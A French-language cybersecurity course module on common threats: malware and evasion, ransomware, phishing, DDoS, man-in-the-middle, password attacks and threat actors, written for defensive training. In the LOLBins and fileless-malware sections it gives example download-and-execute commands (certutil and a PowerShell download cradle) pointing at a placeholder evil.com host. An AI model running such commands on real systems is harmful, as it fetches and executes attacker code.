Module 13 — Common Threats

🦠 13.1 — Malware en detail

Le terme malware (malicious software) designe tout logiciel concu pour endommager, perturber ou obtenir un acces non autorise a un systeme. Voici les principaux types :

Imagine les malwares comme differentes maladies. Un virus a besoin d'un contact pour se propager, un ver se transmet par l'air, un cheval de Troie se deguise en medicament bienfaisant, et un ransomware prend tes organes en otage contre une rancon. Chaque maladie a ses symptomes, ses vecteurs et ses traitements.

Type	Comportement	Vecteur principal	Impact	Exemple reel
Virus	S'attache a un fichier hote, se replique quand le fichier est execute	Fichiers infectes, cles USB	Corruption de fichiers, ralentissement	ILOVEYOU (2000)
Worm	Se propage automatiquement sur le reseau sans interaction	Vulnerabilites reseau	Consommation de bande passante, propagation massive	WannaCry, Conficker
Trojan	Se deguise en logiciel legitime	Telechargements, faux logiciels	Backdoor, vol de donnees	Emotet, Zeus
Ransomware	Chiffre les fichiers et exige une rancon	Email, exploit kits, RDP	Perte d'acces aux donnees, cout financier	LockBit, REvil, Ryuk
Spyware	Espionne l'activite de l'utilisateur silencieusement	Bundled software, sites compromis	Vol d'informations personnelles	Pegasus, FinFisher
Adware	Affiche des publicites non desirees	Logiciels gratuits, extensions navigateur	Nuisance, tracking, redirection	Fireball, DealPly
Rootkit	S'installe au niveau le plus profond du systeme (kernel)	Exploits, malware avance	Acces total cache, tres difficile a detecter	Sony BMG Rootkit, ZeroAccess
Keylogger	Enregistre toutes les frappes clavier	Trojan, acces physique	Vol de mots de passe, d'informations sensibles	Agent Tesla, HawkEye
Fileless Malware	S'execute en memoire sans fichier sur le disque	Scripts PowerShell, macros, WMI	Evasion des antivirus traditionnels	Astaroth, Kovter
Cryptominer	Utilise les ressources du systeme pour miner de la cryptomonnaie	Sites web, malware, extensions	Ralentissement, surconsommation electrique	Coinhive, XMRig

Tendance actuelle

Le fileless malware est en forte augmentation car il echappe aux antivirus traditionnels qui se basent sur l'analyse de fichiers. Il s'execute directement en memoire via PowerShell, WMI ou des macros Office.

Techniques d'evasion des malwares

Technique	Description	Exemple	Detection
Polymorphic	Le malware modifie son code (chiffrement avec cle variable) a chaque propagation, mais garde la meme fonctionnalite	Virlock, Storm Worm	Analyse heuristique, machine learning, sandboxing
Metamorphic	Le malware reecrit completement son code a chaque iteration (pas juste chiffrement) — plus avance que le polymorphisme	Zmist, Regswap	Analyse comportementale, emulation
Fileless	S'execute entierement en memoire sans ecrire sur le disque. Utilise des outils systeme legitimes (PowerShell, WMI, .NET)	Astaroth, Kovter, PowerGhost	EDR, monitoring de PowerShell, AMSI, memory forensics
Living-off-the-Land (LOLBins)	Utilise des outils systeme legitimes deja presents (certutil, mshta, regsvr32, rundll32, wmic, bitsadmin) pour executer du code malveillant	APT29 (Cobalt Strike via rundll32), Emotet (via PowerShell)	Monitoring des processus parents/enfants, regles Sigma, AMSI
Packing / Crypting	Compression et chiffrement du binaire malveillant pour eviter la detection par signature	UPX, Themida, custom packers	Analyse entropie, unpacking dynamique, sandbox
Anti-sandbox	Detecte s'il s'execute dans une VM/sandbox et modifie son comportement (dort, ne fait rien)	Verification de processus VM, resolution d'ecran, mouvement de souris	Sandboxes avancees avec interaction simulee, bare-metal analysis
Anti-debug	Detecte la presence de debuggers et refuse de s'executer	IsDebuggerPresent(), timing checks, NtQueryInformationProcess	Debuggers furtifs, patching des checks anti-debug

LOLBins courants (Living off the Land Binaries)

Binaires Windows legitimes abuses par les attaquants :

certutil.exe — Telecharger des fichiers (certutil -urlcache -split -f http://evil.com/mal.exe)
mshta.exe — Executer du code HTA/VBScript
regsvr32.exe — Charger des DLL distantes (Squiblydoo attack)
rundll32.exe — Executer des fonctions dans des DLL
powershell.exe — Execution de scripts en memoire (IEX (New-Object Net.WebClient).DownloadString(...))
bitsadmin.exe — Telecharger des fichiers via le service BITS
wmic.exe — Execution de commandes a distance, creation de processus

Ransomware en detail

Chaine d'infection typique d'un ransomware

Acces initial : Phishing (piece jointe malveillante), exploitation RDP expose, VPN vulnerable, supply chain
Execution du loader : Macro Office, script PowerShell, DLL sideloading
Mouvement lateral : Mimikatz (credential dumping), PsExec, WMI, exploitation SMB
Escalade de privileges : Obtenir des droits Domain Admin
Preparation : Desactiver les sauvegardes (Volume Shadow Copies), desactiver l'antivirus, exfiltrer les donnees
Deploiement : Chiffrement massif via GPO, PsExec ou outil custom
Rancon : Note de rancon (.txt ou .html), paiement en crypto (Bitcoin, Monero), site .onion de negociation

Evolution des modeles d'extorsion

Type	Description	Premiere apparition
Simple extorsion	Chiffrement des donnees, demande de rancon pour la cle de dechiffrement	CryptoLocker (2013)
Double extorsion	Chiffrement + menace de publication des donnees volees sur un site de leak	Maze (2019)
Triple extorsion	Double extorsion + DDoS sur la victime ou contact direct des clients/partenaires	REvil, SunCrypt (2020)
Quadruple extorsion	Triple + pression sur les employes, partenaires commerciaux, regulateurs	Groupes recents (2021+)

Ransomwares majeurs

Nom	Annee	Impact	Particularite
WannaCry	2017	200 000+ systemes dans 150 pays, NHS UK paralyse	Exploit EternalBlue (SMBv1), propagation worm, attribue a Lazarus Group
NotPetya	2017	10 milliards $ de degats mondiaux (Maersk, Merck, FedEx)	Deguise en ransomware mais wiper destructeur, supply chain via MeDoc (Ukraine)
Ryuk	2018-2021	Hopitaux, collectivites, entreprises, rancons de plusieurs millions	Big game hunting (cibles a forte valeur), deploiement manuel, souvent via TrickBot/Emotet
Conti	2020-2022	Costa Rica (etat d'urgence), HSE Irlande (sante)	Operation structuree comme une entreprise (RH, dev, negociateurs), code source leake en 2022
LockBit	2019-present	Plus prolifique des RaaS, milliers de victimes mondiales	Chiffrement le plus rapide, programme de bug bounty, auto-propagation StealBit

Ransomware-as-a-Service (RaaS)

Le modele RaaS fonctionne comme une franchise criminelle :

Role	Responsabilite	Part des revenus
Developpeurs (Operators)	Creent le ransomware, le panel d'administration, le site de leak, l'infrastructure C2	20-30%
Affilies	Obtiennent l'acces initial, se deplacent lateralement, deploient le ransomware	70-80%
Access Brokers (IAB)	Vendent des acces initiaux (RDP, VPN, credentials) aux affilies	Prix fixe (500$ - 100 000$+)
Negociateurs	Negocient la rancon avec les victimes via chat Tor	Variable

Indicateurs de compromission (IoC) par type de malware

Type d'IoC	Description	Exemple	Outil de detection
File Hash (MD5, SHA-1, SHA-256)	Empreinte unique d'un fichier malveillant	`SHA-256: d7a95...`	VirusTotal, YARA, EDR
IP Addresses	Adresses IP des serveurs C2 ou d'exfiltration	`185.234.xx.xx`	Firewall logs, SIEM, threat intel feeds
Domain Names	Domaines utilises pour le C2, phishing, exfiltration	`evil-update.com`, DGA domains	DNS logs, proxy logs, passive DNS
URLs	URLs specifiques de telechargement ou de C2	`http://evil.com/payload.exe`	Proxy logs, web gateway
Email Indicators	Adresses email, subjects, attachments d'emails de phishing	`invoice@fake-bank.com`	Email gateway, SPF/DKIM/DMARC
YARA Rules	Regles de pattern matching pour identifier des malwares par leur contenu binaire	`rule Emotet { strings: $s1 = "RegWriteStringValue" condition: all of them }`	YARA, ClamAV, EDR
Registry Keys	Cles de registre Windows creees ou modifiees pour la persistence	`HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run`	Sysmon, EDR, FIM
Mutex / Named Pipes	Objets de synchronisation crees par le malware	`Global\MsWinZonesCacheCounterMutexA`	Process monitoring, Sysmon

🎣 13.2 — Phishing en detail

Le phishing est la technique d'ingenierie sociale la plus repandue. Elle consiste a se faire passer pour une entite de confiance afin de voler des informations sensibles.

Le phishing, c'est comme un pecheur. Il lance un appat (email, SMS, appel) dans l'eau (internet) en esperant qu'un poisson (victime) morde a l'hamecon. Plus l'appat ressemble a de la vraie nourriture, plus les chances de succes sont elevees.

Email Phishing (classique)

Envoi massif d'emails frauduleux imitant des organisations legitimes (banques, services en ligne, administration).

Volume : Envoye a des milliers/millions de destinataires
Personnalisation : Faible — message generique
Objectif : Voler des identifiants, installer un malware
Taux de succes : Faible individuellement, mais efficace en masse

Spear Phishing

Phishing cible visant une personne ou un groupe specifique.

Volume : Quelques cibles selectionnees
Personnalisation : Elevee — utilise des informations reelles (nom, poste, projets)
Objectif : Acces a des systemes specifiques, vol de donnees sensibles
Taux de succes : Beaucoup plus eleve que le phishing classique

Statistique

91% des cyberattaques commencent par un email de spear phishing.

Whaling ("chasse a la baleine")

Spear phishing visant specifiquement les dirigeants et cadres superieurs (C-level : CEO, CFO, CTO).

Cibles : PDG, directeurs financiers, membres du conseil
Methode : Emails tres professionnels, souvent lies a des affaires juridiques ou financieres
Impact : Potentiellement devastateur — ces cibles ont des acces privilegies

Variante — BEC (Business Email Compromise) : L'attaquant usurpe l'identite du CEO pour demander un virement urgent au service financier.

Vishing & Smishing

Vishing (Voice Phishing) : Phishing par telephone. L'attaquant se fait passer pour un support technique, une banque ou une autorite.

Smishing (SMS Phishing) : Phishing par SMS. Messages avec liens malveillants pretendant etre un colis en attente, une alerte bancaire, etc.

Le vishing exploite la confiance vocale et l'urgence
Le smishing exploite la rapidite de reaction sur mobile
Les deux contournent les filtres email anti-phishing

Comment identifier un phishing ?

🚩

Red Flags a verifier

Signaux d'alerte dans un email suspect

Element	Signal d'alerte
Expediteur	Adresse email qui ne correspond pas au domaine officiel (ex: support@amaz0n-security.com)
Objet	Urgence artificielle ("Votre compte sera ferme dans 24h !")
Salutation	Generique ("Cher client" au lieu de votre nom)
Liens	URL qui ne correspond pas au site officiel (survoler avant de cliquer)
Pieces jointes	Fichiers inattendus (.exe, .zip, .docm, .js)
Orthographe	Fautes de grammaire et de syntaxe inhabituelles
Demande	Demande d'informations sensibles (mot de passe, numero de carte)

Analyse des headers email : SPF, DKIM, DMARC

Les protocoles d'authentification email permettent de verifier la legitimite d'un email et de detecter le spoofing :

Protocole	Fonction	Verification	Header a verifier
SPF (Sender Policy Framework)	Verifie que le serveur d'envoi est autorise a envoyer des emails pour ce domaine	Compare l'IP de l'expediteur avec la liste d'IP autorisees dans l'enregistrement DNS TXT du domaine	`Received-SPF: pass` ou `fail`
DKIM (DomainKeys Identified Mail)	Verifie l'integrite du message avec une signature cryptographique	Le serveur recepteur verifie la signature DKIM avec la cle publique dans le DNS du domaine expediteur	`DKIM-Signature: v=1; a=rsa-sha256; d=example.com`
DMARC (Domain-based Message Authentication, Reporting and Conformance)	Politique du domaine qui dit quoi faire si SPF/DKIM echouent (none, quarantine, reject)	Combine les resultats SPF et DKIM avec la politique DMARC du domaine	`Authentication-Results: dmarc=pass policy.dmarc=reject`

Verification rapide des headers

Dans un email suspect, chercher dans les headers : Authentication-Results — si SPF=fail, DKIM=fail ou DMARC=fail, l'email est probablement du spoofing.

Techniques d'URL malveillantes

Technique	Description	Exemple
Typosquatting	Enregistrement de domaines avec des fautes de frappe courantes	`gogle.com`, `microsft.com`, `facebo0k.com`
Homoglyph / IDN attack	Utilisation de caracteres Unicode visuellement identiques aux caracteres latins (cyrillique, grec)	`apple.com` vs `аpple.com` (le 'a' est cyrillique), `paypal.com` vs `pаypal.com`
Subdomain abuse	Utilisation de sous-domaines trompeurs sur un domaine controle par l'attaquant	`login.microsoft.com.evil-site.com`
URL shortening	Masquer l'URL reelle derriere un raccourcisseur (bit.ly, tinyurl)	`bit.ly/3xMalware` → redirection vers un site de phishing
Data URI	Encoder du contenu directement dans l'URL pour afficher une fausse page	`data:text/html;base64,PHNjcml...`
Open Redirect	Exploiter une redirection legitime sur un site de confiance	`trusted.com/redirect?url=http://evil.com`

Social Engineering Lifecycle (4 phases)

Cycle de l'ingenierie sociale

1. Research (Recherche)

Collecte d'informations sur la cible : reseaux sociaux, organigramme, habitudes, centres d'interet, fournisseurs. L'attaquant prepare un pretexte credible.

2. Hook (Accroche)

Premier contact avec la cible. L'attaquant etablit un rapport de confiance en exploitant : l'autorite, l'urgence, la reciprocite, la rarete, la sympathie ou la preuve sociale.

3. Play (Exploitation)

La victime effectue l'action souhaitee : clique sur un lien, revele des informations, ouvre une piece jointe, effectue un virement, donne un acces physique.

4. Exit (Sortie)

L'attaquant met fin a l'interaction sans eveiller de soupcons. La victime ne realise pas qu'elle a ete manipulee (ou ne le realise que bien plus tard).

🌊 13.3 — DDoS (Distributed Denial of Service)

Une attaque DDoS vise a rendre un service indisponible en le submergeant de trafic provenant de multiples sources (souvent un botnet).

Imagine un restaurant. Si 10 000 personnes entrent en meme temps et occupent toutes les tables sans rien commander, les vrais clients ne peuvent plus etre servis. Le restaurant est "hors service" meme s'il n'est pas physiquement detruit. C'est le principe du DDoS.

Attaques volumetriques

Saturer la bande passante de la cible avec un volume enorme de trafic.

UDP Flood : Envoi massif de paquets UDP vers des ports aleatoires
DNS Amplification : Exploite des serveurs DNS ouverts pour amplifier le trafic (facteur x50-x70)
NTP Amplification : Meme principe avec des serveurs NTP

Volume : Peut atteindre plusieurs Tbps (terabits par seconde).

Attaques protocolaires

Exploiter les faiblesses des protocoles reseau pour epuiser les ressources.

SYN Flood : Inonde le serveur de requetes SYN sans completer le three-way handshake TCP
Ping of Death : Paquets ICMP surdimensionnes
Smurf Attack : ICMP broadcast avec adresse source usurpee

Cible : La table de connexions du serveur ou du firewall.

Attaques de couche applicative (Layer 7)

Cibler des fonctionnalites specifiques de l'application pour epuiser ses ressources.

HTTP Flood : Envoi massif de requetes HTTP GET/POST qui semblent legitimes
Slowloris : Maintient des connexions HTTP ouvertes le plus longtemps possible
DNS Query Flood : Sature le serveur DNS avec des requetes complexes

Difficulte : Plus difficile a detecter car le trafic ressemble a du trafic normal.

Botnets et amplification

Un botnet est un reseau de machines compromises (zombies) controlees par un attaquant (botmaster).

Mirai (2016) : Botnet IoT qui a infecte des cameras, routeurs et DVR pour lancer une attaque DDoS de 1.2 Tbps contre Dyn DNS, rendant indisponibles Twitter, Netflix, Reddit et d'autres services majeurs
Amplification : L'attaquant envoie de petites requetes a des serveurs mal configures (DNS, NTP, Memcached) avec l'adresse IP source usurpee de la victime. Les reponses, bien plus volumineuses, sont dirigees vers la cible

Facteurs d'amplification

DNS : x28-70 | NTP : x556 | Memcached : x51 000. Une requete de 1 Ko peut generer une reponse de 51 Mo avec Memcached.

Facteurs d'amplification detailles

Protocole	Port	Facteur d'amplification	Requete utilisee	Record d'attaque
DNS	UDP/53	x54 (moyen)	Requete ANY sur un domaine avec large zone file	400 Gbps (2014, CloudFlare)
NTP	UDP/123	x556	Commande MONLIST (liste des 600 derniers clients)	400 Gbps (2014, NTP)
Memcached	UDP/11211	x51 000	Requete GET apres avoir injecte des donnees volumineuses	1.7 Tbps (2018, GitHub)
SSDP	UDP/1900	x30	Requete M-SEARCH (UPnP discovery)	Cible les appareils IoT non securises
CLDAP	UDP/389	x70	Requete LDAP connectionless	Serveurs Active Directory exposes
Chargen	UDP/19	x358	Requete au service character generator (legacy)	Service obsolete encore actif sur certains systemes

Mirai Botnet — Anatomie

🤖

Mirai (2016)

Le botnet qui a change l'IoT

Cibles : Appareils IoT (cameras IP, DVR, routeurs) avec credentials par defaut (admin/admin, root/root)
Propagation : Scan Telnet (port 23) + dictionnaire de 62 couples login/password par defaut
Taille : 300 000 a 600 000 appareils compromis
Attaque majeure : 1.2 Tbps contre Dyn DNS (21 octobre 2016) — Twitter, Netflix, Reddit, GitHub, CNN indisponibles
Impact : Source code publie sur HackForums, centaines de variantes creees depuis (Okiru, Satori, Masuta)
Lecon : L'IoT non securise est un vecteur massif de DDoS. La securite by default est critique.

Strategies de mitigation DDoS

Strategie	Description	Niveau
Scrubbing Centers	Redirige le trafic vers un centre de nettoyage qui filtre le trafic malveillant et ne laisse passer que le trafic legitime (Akamai, Cloudflare, AWS Shield)	Cloud/ISP
CDN (Content Delivery Network)	Distribue le contenu sur de multiples serveurs geographiquement repartis, absorbant le trafic DDoS	Application
Rate Limiting	Limiter le nombre de requetes par IP/session par unite de temps	Application/Reseau
BGP Blackholing	Annoncer une route nulle (blackhole) pour l'IP attaquee aupres des routeurs upstream	ISP/Reseau
Anycast Routing	Distribuer le trafic sur plusieurs points de presence (PoP) pour absorber les pics	Infrastructure
SYN Cookies	Mecanisme du kernel qui permet de gerer les SYN floods sans consommer de memoire pour les half-open connections	OS/Serveur
WAF (Web Application Firewall)	Filtre les requetes Layer 7 malveillantes (HTTP floods, Slowloris)	Application

👤 13.4 — Man-in-the-Middle (MitM)

Dans une attaque MitM, l'attaquant s'insere entre deux parties communicantes pour intercepter, lire ou modifier les echanges sans que les victimes ne le sachent.

Imagine que tu envoies une lettre a un ami. Un facteur malveillant ouvre la lettre, la lit (voire la modifie), la remet dans l'enveloppe et la livre comme si de rien n'etait. Ni toi ni ton ami ne savez que la lettre a ete lue. C'est le Man-in-the-Middle.

Techniques Man-in-the-Middle courantes

🔀 ARP Spoofing / ARP Poisoning

L'attaquant envoie de fausses reponses ARP sur le reseau local pour associer son adresse MAC a l'adresse IP de la passerelle (gateway).

Resultat : Tout le trafic du reseau local passe par la machine de l'attaquant.

Outil : arpspoof, Ettercap, Bettercap

Defense : Dynamic ARP Inspection (DAI), VLAN, chiffrement.

🌐 DNS Spoofing / DNS Poisoning

L'attaquant falsifie les reponses DNS pour rediriger la victime vers un faux site web.

Resultat : La victime croit etre sur le vrai site (banque, email) alors qu'elle est sur un site controle par l'attaquant.

Outil : dnsspoof, Ettercap

Defense : DNSSEC, DNS over HTTPS (DoH), verification des certificats SSL.

🔓 SSL Stripping

L'attaquant intercepte la connexion et degrade HTTPS en HTTP, empechant le chiffrement.

Resultat : Les donnees (mots de passe, etc.) transitent en clair sans que la victime ne le remarque.

Outil : sslstrip, mitmproxy

Defense : HSTS (HTTP Strict Transport Security), verification du cadenas HTTPS.

📡 Evil Twin Wi-Fi

L'attaquant cree un faux point d'acces Wi-Fi avec le meme nom (SSID) qu'un reseau legitime (cafe, hotel, aeroport).

Resultat : Les victimes se connectent au faux Wi-Fi et tout leur trafic est intercepte.

Outil : Airgeddon, WiFi Pumpkin, hostapd

Defense : VPN, ne pas se connecter aux Wi-Fi publics ouverts, verifier les certificats.

🔑 13.5 — Attaques sur les mots de passe

Les mots de passe restent le mecanisme d'authentification le plus repandu et le plus cible par les attaquants.

Essayer systematiquement toutes les combinaisons possibles jusqu'a trouver le bon mot de passe.

Longueur	Caracteres	Combinaisons	Temps approximatif
6 caracteres	Minuscules	309 millions	Quelques secondes
8 caracteres	Mixte + symboles	6 000 milliards	Quelques heures
12 caracteres	Mixte + symboles	475 000 000 milliards	Plusieurs siecles

Defense : Mots de passe longs, lockout apres X tentatives, MFA.

Utiliser une liste de mots de passe courants (dictionnaire) plutot que de tester toutes les combinaisons.

Les listes incluent les mots de passe les plus frequents : "password", "123456", "qwerty"...
Incluent aussi des variations : "P@ssw0rd", "Password1!", "admin123"
La liste rockyou.txt contient plus de 14 millions de mots de passe reels leakes

Defense : Ne jamais utiliser de mots du dictionnaire, utiliser un gestionnaire de mots de passe.

Utiliser des identifiants (email + mot de passe) voles lors de breches de donnees pour tenter de se connecter a d'autres services.

Exploite le fait que 65% des utilisateurs reutilisent le meme mot de passe sur plusieurs sites
Des milliards de credentials sont disponibles sur le dark web
Attaque automatisee avec des outils comme Sentry MBA, OpenBullet

Defense : Ne jamais reutiliser les mots de passe, MFA, monitoring des connexions inhabituelles.

Tables precalculees contenant des hash et leurs mots de passe correspondants. Permet un "reverse lookup" instantane.

Au lieu de calculer le hash en temps reel, on consulte une table deja calculee
Extremement rapide pour les hash non sales (unsalted)
Les tables peuvent peser plusieurs teraoctets

Defense : Toujours utiliser un salt (valeur aleatoire ajoutee avant le hashing). Utiliser des algorithmes lents (bcrypt, Argon2).

L'attaquant utilise directement le hash NTLM d'un mot de passe (sans le casser) pour s'authentifier sur d'autres systemes Windows.

Pas besoin de connaitre le mot de passe en clair
Exploite le protocole d'authentification NTLM de Windows
Permet le lateral movement dans un reseau Active Directory
Outils : Mimikatz, Impacket

Defense : Desactiver NTLM, utiliser Kerberos, Credential Guard, comptes privilegies dedies.

Temps de craquage selon la complexite (GPU RTX 4090, hash NTLM)

Longueur	Minuscules seules	+ Majuscules	+ Chiffres	+ Symboles (95 chars)
6 chars	< 1 sec	< 1 sec	< 1 sec	< 1 sec
8 chars	5 sec	22 min	1 heure	7 heures
10 chars	59 min	1 mois	7 mois	5 ans
12 chars	2 semaines	200 ans	2 000 ans	30 000 ans
16 chars	1 200 ans	milliards d'annees	milliards d'annees	milliards d'annees

Role du Salt dans le hashing

🧂

Salt (sel)

Protection contre les rainbow tables

Un salt est une valeur aleatoire unique ajoutee au mot de passe AVANT le hashing :

hash = H(salt + password) au lieu de hash = H(password)

Sans salt : Le meme mot de passe produit toujours le meme hash → vulnerable aux rainbow tables
Avec salt : Le meme mot de passe produit un hash different pour chaque utilisateur → rainbow tables inutiles
Le salt est stocke en clair a cote du hash (il n'a pas besoin d'etre secret)
Algorithmes recommandes : bcrypt, scrypt, Argon2 (algorithmes lents et sales par design)
Algorithmes a eviter : MD5, SHA-1, SHA-256 seuls (trop rapides, non sales par defaut)

⚡ 13.6 — Menaces avancees (Advanced Threats)

💧

Watering Hole Attack

Compromission de site strategique

L'attaquant identifie les sites web frequemment visites par sa cible et les compromet en y injectant du code malveillant.

Analogie : Au lieu de chasser le lion, le predateur empoisonne le point d'eau ou le lion vient boire. Il suffit d'attendre.

Processus : 1) Identifier les sites visites par la cible (OSINT) → 2) Trouver une vulnerabilite sur ce site → 3) Injecter un exploit kit → 4) Attendre que la cible visite le site → 5) Exploitation automatique

Exemple reel : Le groupe APT Turla a compromis des sites gouvernementaux pour cibler des diplomates. Le groupe Lazarus a cible des sites financiers polonais en 2017.

Defense : Mise a jour des navigateurs, sandboxing, monitoring du trafic web, segmentation reseau.

🚗

Drive-by Download

Telechargement automatique et invisible

Un malware se telecharge et s'installe automatiquement simplement en visitant un site web compromis ou malveillant, sans aucune action de l'utilisateur.

Exploite des vulnerabilites dans le navigateur, ses plugins (Flash, Java) ou le systeme d'exploitation.

Chaine d'exploitation : Site web compromis → Redirect vers exploit kit (RIG, Magnitude) → Detection du navigateur/OS/plugins → Selection de l'exploit adapte → Telechargement et execution du payload

Defense : Mise a jour du navigateur et des plugins, desactiver les plugins inutiles, ad blockers, sandboxing navigateur.

🔗

Supply Chain Attack

Compromettre la chaine d'approvisionnement

L'attaquant compromet un fournisseur de logiciel ou un composant de la supply chain pour atteindre la cible finale (les clients du fournisseur).

Exemples majeurs :

SolarWinds (2020) : Backdoor SUNBURST injectee dans la mise a jour d'Orion, 18 000 organisations touchees dont le Tresor americain et Microsoft
Kaseya VSA (2021) : Exploitation d'une zero-day dans le logiciel de gestion IT, 1 500 entreprises touchees par REvil
NotPetya (2017) : Malware distribue via la mise a jour du logiciel comptable ukrainien MeDoc
Codecov (2021) : Script de CI/CD compromis, exfiltration de variables d'environnement et secrets

Defense : Verification d'integrite des mises a jour (checksums, signatures), monitoring du comportement des logiciels, SBOM (Software Bill of Materials), Zero Trust.

👻

Fileless Malware & LOLBins

Attaques sans fichier et binaires du systeme

Le fileless malware s'execute entierement en memoire en utilisant des outils deja presents sur le systeme (Living off the Land Binaries).

Chaine d'attaque typique :

Email de phishing avec lien ou macro VBA
Macro lance PowerShell en memoire
PowerShell telecharge et execute un payload directement en RAM (IEX (New-Object Net.WebClient).DownloadString('http://evil.com/payload.ps1'))
Le payload utilise des LOLBins (certutil, regsvr32, mshta) pour les actions suivantes
Aucun fichier malveillant n'est ecrit sur le disque

Pourquoi c'est difficile a detecter : Les antivirus traditionnels scannent les fichiers sur disque, pas la memoire. Les processus utilises (PowerShell, WMI) sont legitimes.

Defense : EDR avec monitoring memoire, AMSI (Antimalware Scan Interface), journalisation PowerShell (ScriptBlock Logging, Module Logging), desactiver PowerShell v2, application whitelisting (AppLocker).

⌨️

Typosquatting

Exploitation des fautes de frappe

Enregistrer des noms de domaine similaires a des sites populaires en exploitant les fautes de frappe courantes.

Exemples : gogle.com, facebo0k.com, amaz0n.com, microsft.com

Le site frauduleux imite parfaitement le site original pour voler des identifiants.

Defense : Utiliser les favoris, verifier l'URL, protection du navigateur, DMARC pour les domaines proches.

💀

Zero-Day

Vulnerabilite inconnue et non corrigee

Une vulnerabilite zero-day est une faille inconnue de l'editeur du logiciel. Il n'existe aucun correctif (patch) au moment de l'exploitation.

Pourquoi "zero-day" ? Le developpeur a "zero jour" pour corriger la faille car elle est deja exploitee.

Les zero-days sont extremement precieux : ils se vendent entre 100 000 $ et 2,5 millions $ sur le marche noir.

Defense : Defense en profondeur, EDR, comportemental, sandboxing, segmentation reseau.

🔬 13.7 — Exercice : Identifie la menace

Pour chaque scenario, fais glisser l'etiquette vers le type de menace correspondant :

Un hopital ne peut plus acceder a ses dossiers patients, un message exige 5 BTC

Un email de "Microsoft" demande de verifier votre compte via un lien

Un site e-commerce est inaccessible, le trafic entrant atteint 500 Gbps

Sur un Wi-Fi public, un attaquant intercepte vos identifiants bancaires

Des comptes Netflix sont pirates avec des identifiants leakes de LinkedIn

Une faille non corrigee dans Chrome est exploitee avant que Google ne la decouvre

🔐 Ransomware

Depose ici

🎣 Phishing

Depose ici

🌊 DDoS

Depose ici

👤 Man-in-the-Middle

Depose ici

♻️ Credential Stuffing

Depose ici

💀 Zero-Day

Depose ici

🎭 13.8 — Acteurs de la menace et concepts fondamentaux

Comprendre qui attaque et pourquoi est aussi important que de comprendre le comment. Voici la classification des acteurs et les concepts de base de la gestion des risques.

Classification des hackers par « chapeau »

Type	Intention	Legalite	Exemples
White Hat (chapeau blanc)	Proteger les systemes, trouver et corriger les vulnerabilites	Legal — avec autorisation	Pentesters, chercheurs en securite, bug bounty hunters
Black Hat (chapeau noir)	Exploiter les systemes pour profit, destruction ou espionnage	Illegal	Cybercriminels, groupes APT, script kiddies malveillants
Gray Hat (chapeau gris)	A mi-chemin — agit sans autorisation mais souvent sans intention malveillante	Zone grise legale	Hacktivistes, vulnerability brokers (courtiers en vulnerabilites)

Types d'acteurs de la menace

Acteurs inexperimentes qui utilisent des scripts, outils et exploits existants sans comprendre leur fonctionnement interne.

Motivation : curiosite, prestige, vandalisme
Competence : faible — dependent d'outils automatises
Danger : significatif malgre leur ignorance (les outils sont puissants)

Acteurs qui protestent publiquement contre des entreprises ou des gouvernements en utilisant des cyberattaques comme forme d'activisme.

Motivation : politique, sociale, ideologique
Methodes : defacement de sites, DDoS, fuites de donnees
Exemples : Anonymous, LulzSec
Classification : Gray Hat — agissent pour une cause mais sans autorisation

Acteurs qui decouvrent des exploits et les signalent aux editeurs (ou les vendent). Ils recherchent des vulnerabilites pour obtenir une recompense ou un profit.

Motivation : financiere (bug bounty, revente) ou ethique
Methodes : recherche de vulnerabilites, reverse engineering, fuzzing
Classification : Gray Hat — entre White Hat (signalement responsable) et Black Hat (vente sur le dark web)
Plateformes : HackerOne, Bugcrowd, Zerodium (achat d'exploits)

Hackers finances et diriges par des gouvernements pour voler des secrets d'Etat, conduire des operations de sabotage ou mener de l'espionnage industriel.

Motivation : espionnage, sabotage, avantage geopolitique
Competence : tres elevee — acces a des ressources illimitees
Exemples : APT28 (Russie), APT41 (Chine), Lazarus Group (Coree du Nord), Equation Group (USA)
Classification : Black Hat meme si soutenu par un Etat

Groupes organises motives par le profit financier : ransomware, fraude, vol de donnees.

Modeles : RaaS, Initial Access Brokers, Money Mules
Exemples : LockBit, Conti, REvil, FIN7

Concepts fondamentaux de securite

Concept	Definition	Exemple
Menace (Threat)	Tout danger potentiel pour une ressource informatique	Un groupe APT ciblant une entreprise
Vulnerabilite (Vulnerability)	Une faille ou faiblesse dans un systeme qui peut etre exploitee	Un serveur non patche avec CVE-2017-0144
Exploit	Le mecanisme utilise pour compromettre une ressource en tirant parti d'une vulnerabilite	Le module Metasploit EternalBlue
Risque (Risk)	La probabilite que des consequences indesirables se produisent (menace x vulnerabilite x impact)	Probabilite elevee si serveur expose avec vulnérabilite connue

Strategies de gestion des risques

Strategie	Description	Exemple
Acceptation (Risk Acceptance)	Le cout de la protection depasse le cout du risque — on accepte le risque en connaissance de cause	Un administrateur estime que la vulnerabilite a un impact faible et decide de ne rien faire
Evitement (Risk Avoidance)	On elimine l'activite qui cree le risque	Desactiver un service non essentiel vulnerable
Reduction (Risk Reduction)	On reduit la probabilite ou l'impact du risque	Patcher un systeme, ajouter un firewall
Transfert (Risk Transfer)	On transfere le risque a un tiers	Souscrire une cyberassurance, externaliser l'hebergement

A retenir pour l'examen : Si le cout de gestion d'une vulnerabilite depasse le cout du risque, et que l'organisation decide de ne rien faire, elle adopte une strategie d'acceptation du risque (risk acceptance).

Common Threats

🦠 13.1 — Malware en detail

Techniques d'evasion des malwares

Ransomware en detail

Chaine d'infection typique d'un ransomware

Evolution des modeles d'extorsion

Ransomwares majeurs

Ransomware-as-a-Service (RaaS)

Indicateurs de compromission (IoC) par type de malware

🎣 13.2 — Phishing en detail

Email Phishing (classique)

Spear Phishing

Whaling ("chasse a la baleine")

Vishing & Smishing

Comment identifier un phishing ?

Red Flags a verifier

Analyse des headers email : SPF, DKIM, DMARC

Techniques d'URL malveillantes

Social Engineering Lifecycle (4 phases)

🌊 13.3 — DDoS (Distributed Denial of Service)

Attaques volumetriques

Attaques protocolaires

Attaques de couche applicative (Layer 7)

Botnets et amplification

Facteurs d'amplification detailles

Mirai Botnet — Anatomie

Mirai (2016)

Strategies de mitigation DDoS

👤 13.4 — Man-in-the-Middle (MitM)

🔑 13.5 — Attaques sur les mots de passe

Temps de craquage selon la complexite (GPU RTX 4090, hash NTLM)

Role du Salt dans le hashing

Salt (sel)

⚡ 13.6 — Menaces avancees (Advanced Threats)

Watering Hole Attack

Drive-by Download

Supply Chain Attack

Fileless Malware & LOLBins

Typosquatting

Zero-Day

🔬 13.7 — Exercice : Identifie la menace

🔐 Ransomware

🎣 Phishing

🌊 DDoS

👤 Man-in-the-Middle

♻️ Credential Stuffing

💀 Zero-Day

